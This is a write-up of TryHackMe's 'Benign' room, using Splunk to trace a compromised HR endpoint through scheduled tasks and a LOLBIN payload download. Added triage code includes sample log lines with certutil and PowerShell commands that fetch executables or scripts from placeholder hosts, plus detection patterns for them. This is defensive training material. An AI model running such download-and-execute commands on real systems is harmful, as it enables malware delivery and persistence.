TryHackMe — Benign Challenge Room Walkthrough

An Endpoint Forensic Investigation using Splunk

Drew Arpino
9 min read · Sep 29, 2024
Image Credit: https://tryhackme.com/r/room/benign

Introduction:

Imagine this: You’re on the front lines of your organization’s security team when suddenly, intrusion detection alerts start firing from an endpoint, indicating discovery and persistence activity. You need to dive into your security logging platform, investigate the logs, and contain the threat. If this sounds like a thriller you want to be part of, you’ve stumbled upon the right blog!

Welcome to my weekly walkthrough! This week, we’re tackling the Benign room from TryHackMe. Using the Splunk data and logging platform, we’re going to investigate a compromised endpoint, but we only have the process execution logs (Event ID: 4688) ingested into the platform. Together, we’ll analyze the logs to find the compromised endpoint and then uncover how the malicious payload was downloaded onto the system, where it was hosted, and how it bypassed the security controls to get there. Sounds like fun, right? Let’s get to it!

In the spirit of learning, I won’t be revealing any flags in this write-up, but I hope that this guide sets you on the right track — you got this! If you find this walkthrough helpful in leveling up your skills or getting you through a tricky question, give it a clap! Your feedback helps me improve and continue supporting your security journey. Thanks for reading!

Challenge Link: https://tryhackme.com/r/room/benign

Challenge Scenario:

One of the client’s IDS indicated a potentially suspicious process execution indicating one of the hosts from the HR department was compromised. Some tools related to network information gathering / scheduled tasks were executed which confirmed the suspicion. Due to limited resources, we could only pull the process execution logs with Event ID: 4688 and ingested them into Splunk with the index win_eventlogs for further investigation.

Question 1: How many logs are ingested from the month of March, 2022?

Let’s dive right in and start by getting an overview of how many logs have been ingested by Splunk in March 2022. First, we’ll open the Search & Reporting App from the left side of the dashboard:

Once inside the Search tab, we’ll need to select the correct index that we want to query. Remember from the challenge scenario that the captured process execution logs were ingested into the win_eventlogs index.

Due to limited resources, we could only pull the process execution logs with Event ID: 4688 and ingested them into Splunk with the index win_eventlogs for further investigation.

So, to answer Question 1 we’ll need to find the total number of events ingested in March 2022. To do that we’ll first input the index name we want to search, then hit the date/time button to change the search range. Let’s select a Date Range between 03/01/2022 and 03/31/2022 and then press Apply.

This will show us the total number of events during the selected date range to answer Question 1.

Question 2: Imposter Alert: There seems to be an imposter account observed in the logs, what is the name of that user?

Okay, before diving into the logs again let’s pull back and review the information provided to us. We have a list of usernames and their corresponding departments which will be our point of comparison for “real” users versus “imposter” users.

About the Network Information

The network is divided into three logical segments. It will help in the investigation.

IT Department

James

Moin

Katrina

HR department

Haroon

Chris

Diana

Marketing department

Bell

Amelia

Deepak

Now that we have the correct index and date range selected already, let’s start to analyze the data.

To answer Question 2, we need to look at all the usernames captured within the ingested data. For that, we can leverage the stats command to display all the aggregated usernames from the UserName field.

index=win_eventlogs
| stats count by UserName

This will show us all 11 of the UserNames in the data! After a comparison with the provided users list, we’ll find one that looks similar but not quite right…
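As an added example that is not part of the original walkthrough or the room, the Python script below does the Question 2 comparison mechanically instead of by eye: it normalises every UserName seen in the 4688 data (domain prefix, case, separators, a suffix such as “.fort”) and flags accounts that only resemble a roster member after digit-for-letter substitutions are folded or that sit one edit away from a real name. The roster is the one listed above; the observed usernames, including the lookalike M0in and the SYSTEM account, are constructed for the example and are not the room’s data.

```python
import re

# Roster from the room's network information section (IT, HR, Marketing).
ROSTER = {
    "IT": ["James", "Moin", "Katrina"],
    "HR": ["Haroon", "Chris", "Diana"],
    "Marketing": ["Bell", "Amelia", "Deepak"],
}

# Digit/symbol substitutions often used to make a rogue account resemble a real one.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                            "5": "s", "7": "t", "@": "a", "$": "s"})


def account_key(name: str) -> str:
    """Reduce 'CORP\\Chris.fort' or 'chris.fort@corp.local' to 'chrisfort'."""
    local = name.split("\\")[-1].split("@")[0].lower()
    return re.sub(r"[._\- ]", "", local)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance with the classic two-row DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_user(name: str, roster=ROSTER):
    """Return (verdict, department, roster_name) for one observed UserName.

    known     - matches a roster member once case, separators and a suffix
                such as '.fort' are ignored
    lookalike - matches only after homoglyph folding, or is one edit away
    unknown   - no roster member resembles it (service accounts, etc.)
    """
    key = account_key(name)
    folded = key.translate(HOMOGLYPHS)
    best = None
    for dept, members in roster.items():
        for member in members:
            mk = member.lower()
            if key == mk or key.startswith(mk):
                return ("known", dept, member)
            dist = 0 if folded.startswith(mk) else edit_distance(folded, mk)
            if dist <= 1 and (best is None or dist < best[0]):
                best = (dist, dept, member)
    return ("lookalike", best[1], best[2]) if best else ("unknown", None, None)


def find_imposters(observed, roster=ROSTER):
    """Accounts that resemble a roster member but are not one."""
    hits = []
    for user in observed:
        verdict, dept, member = classify_user(user, roster)
        if verdict == "lookalike":
            hits.append((user, dept, member))
    return hits


# Constructed UserName values standing in for `stats count by UserName` output;
# M0in and SYSTEM are invented for this example and are not the room's data.
OBSERVED_USERS = ["James", "Moin", "Katrina", "Haroon", "Chris.fort", "Diana",
                  "Bell", "Amelia", "Deepak", "M0in", "SYSTEM"]

if __name__ == "__main__":
    for user in OBSERVED_USERS:
        print(f"{user:12} -> {classify_user(user)}")
    print("imposter candidates:", find_imposters(OBSERVED_USERS))
```

The "known" check deliberately runs before the fuzzy one, so a legitimate variant such as Chris.fort is never reported as a lookalike, while a genuinely unrelated account (SYSTEM) is reported as unknown rather than forced onto the nearest roster name.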

Question 3: Which user from the HR department was observed to be running scheduled tasks?

Alright, to find the answer to Question 3 we’re going to search for evidence of persistence by looking for scheduled tasks activity within the HR department.

Since Splunk only has ingested logs for the process execution events we’ll need to use the name of the scheduled tasks executable in our search — schtasks.exe

index=win_eventlogs schtasks

This will return 87 scheduled task events, but we can speed up our analysis by looking at the usernames that appear in these events: select UserName from the Selected Fields list on the left.

This shows us four usernames appearing in the data set, so let’s just match the visible entries against the HR department list and see which user appears…

HR department

Haroon

Chris

Diana

Question 4: Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host?

Okay! Now we’re going to dive deeper into our analysis and look for indicators of how the actor brought the payload/tools into the environment.

The first thing to do is narrow down our search scope and only view the logging data for the HR department users. Remember, we already have a list of all HR users from the previous question so all we need to do is format our query to include only those users:

index=win_eventlogs (UserName="Daina" OR UserName="Chris.fort" OR UserName="Haroon")

But even with the tighter search scope, we still have too many logs to go through manually.

Next, we need to drill down even further by searching for activity related to living off the land binaries (LOLBINS). For some background, LOLBINS are legitimate Microsoft-signed binaries that are native to Windows which could also be abused to perform some unintended activity by an adversary.

Fortunately, we don’t have to know these off the top of our heads and we can instead refer to the living off the land binaries and scripts (LOLBAS) repository on GitHub!

While the LOLBAS repository is a great start, we still need to find the exact tool within the list. Let’s work a little smarter and take a look at the MITRE ATT&CK knowledge base to see if we can find specific Windows tools that are used for Ingress Tool Transfer (MITRE ATT&CK T1105).

According to the page for this technique:

On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest.

Now if we cross-reference these utilities with the LOLBAS repository, we will find a couple of utilities to search for!

So, putting all of this together, we are going to use Splunk to search the win_eventlogs index for events from the known HR users where the captured process command line (4688) matches one of the LOLBAS download methods that we validated with MITRE ATT&CK.

index=win_eventlogs (UserName="Daina" OR UserName="Chris.fort" OR UserName="Haroon")
| search CommandLine="*NAME OF LOLBIN*"

And there we go — we found a hit in the logs! Look at the UserName field, this is the answer to Question 4. Keep this search result open as we are going to use it to answer the next few questions too.

Question 5: To bypass the security controls, which system process (lolbin) was used to download a payload from the internet?

Fortunately, we already found the answer since the lolbin name was how we discovered the answer to Question 4.

Question 6: What was the date that this binary was executed by the infected host? format (YYYY-MM-DD)

From the same event that we found in Question 4, enter the date from the Time column or the EventTime field from the event log — they are the same.

Question 7: Which third-party site was accessed to download the malicious payload?

In the CommandLine field, there is a visible URL in the command. The domain name is what we are looking for to answer Question 7.

Question 8: What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?

The file path at the end of the C2 URL from the previous question points to an executable (.exe) file that was downloaded onto the victim’s system.
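The following Python script is an added example, not code from this walkthrough or from TryHackMe. It replays the triage from Questions 3 through 8 offline over a handful of constructed Event ID 4688 records written as key="value" pairs: it restricts the events to the HR users, flags schtasks.exe executions, matches the CommandLine against the download-capable LOLBINs named in the ATT&CK T1105 text quoted above (certutil, bitsadmin, curl and the PowerShell download methods), and pulls out the execution date, the host that served the payload and the file name at the end of the URL. The HR account spellings, host names, URLs and file names in the sample data are assumptions made for the example and are not the room’s data.

```python
import re
from urllib.parse import urlparse

# HR accounts (assumed spellings for the constructed data; matched case-insensitively).
HR_USERS = {"haroon", "chris.fort", "diana"}

# Splunk-style key="value" pairs as they might be extracted from a 4688 event.
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

# Download-capable LOLBINs from the ATT&CK T1105 list cross-referenced with LOLBAS.
# Each pattern requires the switch that actually fetches content, not just the binary name.
LOLBINS = {
    "certutil":   re.compile(r"\bcertutil(?:\.exe)?\b.*?-urlcache", re.I),
    "bitsadmin":  re.compile(r"\bbitsadmin(?:\.exe)?\b.*?/transfer", re.I),
    "curl":       re.compile(r"\bcurl(?:\.exe)?\b", re.I),
    "powershell": re.compile(r"\bpowershell(?:\.exe)?\b.*?"
                             r"(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b)", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def parse_event(line: str) -> dict:
    """Turn one key="value" record into a dict of fields."""
    return dict(FIELD_RE.findall(line))


def is_scheduled_task(event: dict) -> bool:
    """Question 3: any execution of schtasks.exe, by image path or command line."""
    text = (event.get("ProcessName", "") + " " + event.get("CommandLine", "")).lower()
    return "schtasks" in text


def lolbin_download(event: dict):
    """Questions 4, 5, 7, 8: which LOLBIN fetched what, and from where."""
    cmd = event.get("CommandLine", "")
    for name, pattern in LOLBINS.items():
        if not pattern.search(cmd):
            continue
        url_match = URL_RE.search(cmd)
        if not url_match:
            continue  # binary used in download mode but no URL on the command line
        url = url_match.group(0)
        parsed = urlparse(url)
        return {"lolbin": name, "url": url, "host": parsed.hostname,
                "file": parsed.path.rsplit("/", 1)[-1]}
    return None


def triage(lines, users=HR_USERS):
    """Findings as (UserName, date, finding_type, detail) for the given users only."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("UserName", "").lower() not in users:
            continue
        date = ev.get("EventTime", "")[:10]  # YYYY-MM-DD, the format Question 6 asks for
        if is_scheduled_task(ev):
            findings.append((ev["UserName"], date, "scheduled_task", ev.get("CommandLine", "")))
        download = lolbin_download(ev)
        if download:
            findings.append((ev["UserName"], date, "ingress_tool_transfer", download))
    return findings


# Constructed 4688 records; users, hosts, URLs and file names are invented for this example.
SAMPLE_4688 = [
    'EventTime="2022-03-03 09:12:44" HostName="HR_01" UserName="Chris.fort" ProcessName="C:\\Windows\\System32\\whoami.exe" CommandLine="whoami /all"',
    'EventTime="2022-03-03 09:40:10" HostName="HR_01" UserName="Haroon" ProcessName="C:\\Windows\\System32\\schtasks.exe" CommandLine="schtasks /create /sc daily /tn Updater /tr C:\\Users\\Haroon\\upd.exe"',
    'EventTime="2022-03-04 10:15:03" HostName="HR_02" UserName="Diana" ProcessName="C:\\Windows\\System32\\certutil.exe" CommandLine="certutil -urlcache -split -f https://filesharing.example.net/tools/update.exe C:\\Users\\Diana\\update.exe"',
    'EventTime="2022-03-04 11:02:51" HostName="IT_01" UserName="James" ProcessName="C:\\Windows\\System32\\certutil.exe" CommandLine="certutil -urlcache -split -f https://filesharing.example.net/tools/update.exe C:\\temp\\u.exe"',
    'EventTime="2022-03-05 08:30:00" HostName="HR_01" UserName="Chris.fort" ProcessName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" CommandLine="powershell -nop -c IEX(New-Object Net.WebClient).DownloadString(\'http://cdn.example.org/s.ps1\')"',
    'EventTime="2022-03-05 08:31:12" HostName="HR_02" UserName="Diana" ProcessName="C:\\Windows\\System32\\net.exe" CommandLine="net view"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_4688):
        print(finding)
```

Two design points worth noting: the certutil and bitsadmin patterns insist on the download switch (-urlcache, /transfer), so routine uses such as certutil -hashfile do not fire, and the James record is dropped before any matching happens, which is exactly what the UserName filter in the Splunk search above achieves.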

Question 9: The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{……….}; what is that pattern?

Now that we have analyzed the suspicious event within Splunk, we need to start looking at the malicious content, but how do we do that? Well, the wording of this question is a bit confusing but since we do not have access to the suspicious binary within our ingested data, we’re going to pivot and gather some intelligence on the C2 URL instead.

Let’s start out by checking the C2 URL against VirusTotal to see if we can gather any information about it.

While the detection looks clean, let’s navigate to the Details tab to get some extra information. Navigate to the HTML Info section and check out the Meta Tags — notice anything interesting?

Is that a flag we see?

Question 10: What is the URL that the infected host connected to?

Okay, we’ve reached the last question, and it’s a straightforward one. The URL that the infected host connected to is the same one we used to answer Question 9. Simply copy, paste, and submit the final flag!

Conclusion:

A big thank you to TryHackMe for another awesome hands-on challenge! By leveraging Splunk, we’ve successfully identified the affected HR user and uncovered how a Living off the Land (LOLBIN) binary was abused to bypass security controls and download the malicious payload. Our investigation revealed that the payload was hosted on a suspicious URL, which we traced back to a compromised website with some interesting metadata.

The Benign room is a great opportunity to go hands-on with Splunk, exercise your research skills, and get familiar with the LOLBAS repository. As a defender, understanding how legitimate binaries are abused can help enrich your investigations and uncover the whole attack story. Personally, I find every opportunity to practice log analysis in a logging or SIEM platform helpful to keep my skills sharp and get the repetitions in with the tool. With the analysis of the logs completed, let’s wrap up this investigation!

Remember, if you found this walkthrough helpful in leveling up your skills or getting you through a tricky question, please give it a clap! Your feedback lets me know that I helped you out on your security journey. We’re in this together! Thanks for the support!

Until next week’s challenge — stay curious and be safe out there!

Tools & References:

Splunk (Stats): https://docs.splunk.com/Documentation/Splunk/9.3.1/SearchReference/Stats

Microsoft Learn (schtasks.exe): https://learn.microsoft.com/en-us/windows/win32/taskschd/schtasks

MITRE ATT&CK — Ingress Tool Transfer — T1105: https://attack.mitre.org/techniques/T1105/

Microsoft Learn (Certutil): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

VirusTotal: https://www.virustotal.com/gui/url/ec89f7db79c0760ecd6676a32feb5b0362526cbd491302ff3ad7bb0b640d21ce/details
